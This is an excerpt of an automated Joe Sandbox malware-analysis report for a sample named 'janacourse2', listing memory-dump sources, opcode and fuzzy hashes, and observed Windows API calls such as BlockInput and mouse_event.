                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Variable is not of type 'Object'.
                                                                                                            • API String ID: 0-1840281001
                                                                                                            • Opcode ID: 78ba656690ffbf28b1a29a459de4e0ae70b1b6b8198034c8e13a4c07c2a52834
                                                                                                            • Instruction ID: 4e0cd668a339c98a4cf83ffebccfbb2c18efa8f522dc1b0f9279c97dde1748cd
                                                                                                            • Opcode Fuzzy Hash: 78ba656690ffbf28b1a29a459de4e0ae70b1b6b8198034c8e13a4c07c2a52834
                                                                                                            • Instruction Fuzzy Hash: BE32BF74900208DBDF15DF95C881BFEBBB5BF04344F1080A9E846AB286CB75AD45EFA0
                                                                                                            APIs
                                                                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00FE6766,?,?,00000008,?,?,00FEFEFE,00000000), ref: 00FE6998
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionRaise
                                                                                                            • String ID:
                                                                                                            • API String ID: 3997070919-0
                                                                                                            • Opcode ID: 1184fe288ff2e6785ed18563fe0dae6b52c7545844f449d0520eafadcd9d03ad
                                                                                                            • Instruction ID: eae6ccfec06b48326eb75b1f31153e7824eebca2cf1b2b88d8a77087b52af0ad
                                                                                                            • Opcode Fuzzy Hash: 1184fe288ff2e6785ed18563fe0dae6b52c7545844f449d0520eafadcd9d03ad
                                                                                                            • Instruction Fuzzy Hash: F0B17D32A10648CFD715CF29C48AB647BE0FF153A4F258658E8D9CF2A2C335EA81DB40
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID: 0-3916222277
                                                                                                            • Opcode ID: e71effcd8ba3a6a3f436c07dc32c8579ac99806d616c431d43f7a95ab4097c91
                                                                                                            • Instruction ID: 6bc4af39848ff12b81c46f21bd9cc5dede982e8ef4ee20e87b73372b62f28ae7
                                                                                                            • Opcode Fuzzy Hash: e71effcd8ba3a6a3f436c07dc32c8579ac99806d616c431d43f7a95ab4097c91
                                                                                                            • Instruction Fuzzy Hash: 27128E75D0022ADBDB15CF58C981BEEB7F5FF48310F1081AAE849EB295D7349A81DB90
                                                                                                            APIs
                                                                                                            • BlockInput.USER32(00000001), ref: 0102EABD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: BlockInput
                                                                                                            • String ID:
                                                                                                            • API String ID: 3456056419-0
                                                                                                            • Opcode ID: 31dc09bb97396c2d21b6a6881b4cd506713f229b9efd343011509277378b20ea
                                                                                                            • Instruction ID: 82979a56aefc2179cce6dde32deba2460c98714eda9790722853cbcbb960c44b
                                                                                                            • Opcode Fuzzy Hash: 31dc09bb97396c2d21b6a6881b4cd506713f229b9efd343011509277378b20ea
                                                                                                            • Instruction Fuzzy Hash: D3E04F352002149FD710EF5AD844E9AF7EDAF98764F00845AFC8AC7351DBB4F8408BA1
                                                                                                            APIs
                                                                                                            • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 0101E37E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: mouse_event
                                                                                                            • String ID:
                                                                                                            • API String ID: 2434400541-0
                                                                                                            • Opcode ID: 27eb5ba48e83bb9c2a83add63fac3213c06026b2115b4995709e6a21abf316e2
                                                                                                            • Instruction ID: 76cf4470b07f809d6ca9cc0efc76cdf218603079584217e542a97fe3fd53baa5
                                                                                                            • Opcode Fuzzy Hash: 27eb5ba48e83bb9c2a83add63fac3213c06026b2115b4995709e6a21abf316e2
                                                                                                            • Instruction Fuzzy Hash: 60D05BF69502013DF67F093CCA3FF7E3948E301540F40D789B9C18558DD58D95445011
                                                                                                            APIs
                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,00FD03EE), ref: 00FD09DA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                            • String ID:
                                                                                                            • API String ID: 3192549508-0
                                                                                                            • Opcode ID: e30b468dcd370fb597ce4eb0c9c979bb3df543af61a6ac2bee5615c2933c59bc
                                                                                                            • Instruction ID: 29bc029ac08ff65445c1443ec37554059e21f33ccab96ce3ad1c12cf16d18755
                                                                                                            • Opcode Fuzzy Hash: e30b468dcd370fb597ce4eb0c9c979bb3df543af61a6ac2bee5615c2933c59bc
                                                                                                            • Instruction Fuzzy Hash:
Strings
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID:
• String ID: 0
• API String ID: 0-4108050209
• Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
• Instruction ID: 0bcec54859ad7e679b65416c172dfa5ec6e14ed46baba19462af35d8c1db25fc
• Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
• Instruction Fuzzy Hash: BB512572E0C7455ADB387568886A7BE73979B02360F2C050BD886DF382F619DE06F356
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d58340813ae995f8a32acd47bbeb83919726482b623e3881532716577c3c5885
• Instruction ID: 84d44c8f69f79af992799ea23862d20a89d282e4049f3d1d8703eb6541053119
• Opcode Fuzzy Hash: d58340813ae995f8a32acd47bbeb83919726482b623e3881532716577c3c5885
• Instruction Fuzzy Hash: 54325732D29F818DD733A535D8223366249AFB73D5F25C737F81AB5999EB2AC4835200
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ad410da5bd3bebb3234123215b208b11da836efd24136b42fd274ebdc860aaab
• Instruction ID: c4fd43e1b6d05baba6e642a8de4521efb0ef5f332cb99a5371ba0aea5db6d792
• Opcode Fuzzy Hash: ad410da5bd3bebb3234123215b208b11da836efd24136b42fd274ebdc860aaab
• Instruction Fuzzy Hash: 7A32F731A001868BFF26CE2CC695BBD7BE1EB45314F1882EAD6C9DB2D1D6349D81E741
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6fa55748ec5b329629840c1683657ccabb150d7d07b934c4c64d4575a5f63577
• Instruction ID: df34b0cdba744a7d7980f9d2c8b78e4afcc2f3e3c0daebb4dc7293aed475540e
• Opcode Fuzzy Hash: 6fa55748ec5b329629840c1683657ccabb150d7d07b934c4c64d4575a5f63577
• Instruction Fuzzy Hash: 7622C171E0460A9FDF14DF65C881BEEB3B6FF44710F148129E912AB2A1EB399914EF50
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f0abedb5acb3853f14ec1c1fd5018e40a9648f887deb751583f76a2638888818
• Instruction ID: 77d9a11414bd6c51d7a4c9e15a8aac8d9bbe17563f6b274e49b822eb791f04cd
• Opcode Fuzzy Hash: f0abedb5acb3853f14ec1c1fd5018e40a9648f887deb751583f76a2638888818
• Instruction Fuzzy Hash: 3002E6B1E0020AEBDB14DF54D881BADB7B5FF44300F108169E9069B3A0EB35AE14EF91
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f23fc04bdfdf04037809f78004f8876fb01129860b7ad7afff9a00b8affd420b
• Instruction ID: dd070c1c981e252c5383d5eaf9418582bad1fd3ec475cee9c72a62292b6abacb
• Opcode Fuzzy Hash: f23fc04bdfdf04037809f78004f8876fb01129860b7ad7afff9a00b8affd420b
• Instruction Fuzzy Hash: 50B1DD30E2AF404DD72396398821337B65CBFBB6D5B91D71BFC6678E16EB2685834240
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
• Instruction ID: de327eba4b9be7bbf82fb6790c97d8beb057792f55ff090eed8c67f93381cb6f
• Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
• Instruction Fuzzy Hash: DA915873A080A359DB294639857417EFFE36A923B131E079FD4F2CB2C5EE149554F620
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
• Instruction ID: 5ade836d50f2ba1a2e2700176c81c1f7ff226f23d3ed3932f0be03e06c472548
• Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
• Instruction Fuzzy Hash: 6D9143736090A35ADB2D427A857407EFFE26A923B131E079FD4F2CA2C5FD249564F620
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 27a0e8338f4ae30d394ae593967e9a9e0a899335f3f4358955dadde2426327ec
• Instruction ID: 0044475403c1d031b7f600f15e44cabb12c3c20a0073e958e124c2a47b8735d7
• Opcode Fuzzy Hash: 27a0e8338f4ae30d394ae593967e9a9e0a899335f3f4358955dadde2426327ec
• Instruction Fuzzy Hash: 18617932A0870956DA34BA288C96BBE3397DF81760F1C091BE843DF395F6199E43B355
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6881065cb1fca9e28be1ecf94750afcc7befb2ccbb9d147fc015b3291199af01
                                                                                                            • Instruction ID: 5d0f5e1b21c5b005b7c5d6aa0435673f2387f18bca79bd88d46a8749373196d3
                                                                                                            • Opcode Fuzzy Hash: 6881065cb1fca9e28be1ecf94750afcc7befb2ccbb9d147fc015b3291199af01
                                                                                                            • Instruction Fuzzy Hash: 71617932E0870956DA387A288C52BBF73979F42764F1C095BE843DF381FA16ED42B255
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                            • Instruction ID: b8c7e90210c7dae8e70810bc4190ebfa1ec5295057d372db13c03a4ad69e6ed5
                                                                                                            • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                            • Instruction Fuzzy Hash: 7A815673A090A319EB698279853443EFFE37A923B131E079FD4F2CA2D1ED248554F620
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1653083565.00000000014D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 014D8000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_14d8000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                            • Instruction ID: 6479faa0c251caf28b08d3415b81488515649f97ddb93e0858212ec00e1f7693
                                                                                                            • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                            • Instruction Fuzzy Hash: 4441D371D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 008bf39707338cc9d983f86ebc8232bde26f408400f51856fa11cfb2ac2a7b53
                                                                                                            • Instruction ID: ece4be69f79a78f07b7dc9b32499637644add3f7ba539005fa8f4667404510ca
                                                                                                            • Opcode Fuzzy Hash: 008bf39707338cc9d983f86ebc8232bde26f408400f51856fa11cfb2ac2a7b53
                                                                                                            • Instruction Fuzzy Hash: 4421B7326206118BD728CEB9C86267E73E5A754314F25866EE4E7C77C5DE3AA904CB80
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1653083565.00000000014D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 014D8000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_14d8000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                            • Instruction ID: 4cd2489ea8259c8ebc200c616cb358b6ba4588c70333e4422590945d1229a75f
                                                                                                            • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                            • Instruction Fuzzy Hash: 6A018078A01209EFCB44DF98C5A09AEF7B5FF48310F60859AE819A7315D731AE42DF80
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1653083565.00000000014D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 014D8000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_14d8000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                            • Instruction ID: 2b1319278f11498aa35c2f69db7a2bbef23c2c0f253fdf210f47aa911e9b5924
                                                                                                            • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                            • Instruction Fuzzy Hash: 1601A478A00109EFCB44DF98C5909AEF7F5FF48310F20859AD909A7711D730AE42DB80
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1653083565.00000000014D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 014D8000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_14d8000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                            • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                                            • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                            • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                                            APIs
                                                                                                            • DeleteObject.GDI32(00000000), ref: 01032B30
                                                                                                            • DeleteObject.GDI32(00000000), ref: 01032B43
                                                                                                            • DestroyWindow.USER32 ref: 01032B52
                                                                                                            • GetDesktopWindow.USER32 ref: 01032B6D
                                                                                                            • GetWindowRect.USER32(00000000), ref: 01032B74
                                                                                                            • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 01032CA3
